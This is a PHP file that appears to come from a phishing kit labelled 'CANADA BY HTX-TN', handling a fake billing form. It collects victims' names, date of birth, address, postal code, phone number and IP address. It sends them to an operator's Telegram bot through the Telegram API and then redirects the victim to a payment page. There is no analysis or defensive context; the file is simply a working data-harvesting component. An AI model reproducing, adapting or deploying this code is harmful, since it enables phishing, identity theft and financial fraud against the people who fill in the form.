<?php

error_reporting(0);
session_start();
include "../../config.php";
$ip = getenv("REMOTE_ADDR");
$link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ;


$ph = str_replace(' ', '', $_POST['phone']);
$_SESSION["ph"]  = $ph;



	$_SESSION["name"]= $_POST['First-Name']." ".$_POST['Last-Name'];

$hostname = gethostbyaddr($ip);
$message = "[========== ❄️ CANADA BY HTX-TN RZLT(Billing) ❄️ ===========]\r\n";
$message .= "|First Name      	 : ".$_POST['nom']."\r\n";
$message .= "|last name       	 : ".$_POST['prenom']."\r\n";
$message .= "|Date       	 : ".$_POST['dob']."\r\n";
$message .= "|Adress      	 : ".$_POST['adress']."\r\n";
$message .= "|City            : ".$_POST['city']."\r\n";
$message .= "|zip   	         : ".$_POST['zip']."\r\n";
$message .= "|Phone           : ".$_POST['phone']."\r\n";
$message .= "[========= $ip ========]\r\n";

file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );
echo"<script>location.replace('../pay.php?country.x=Global&one=ok&flowId=ul&_Email=data');</script>";


?>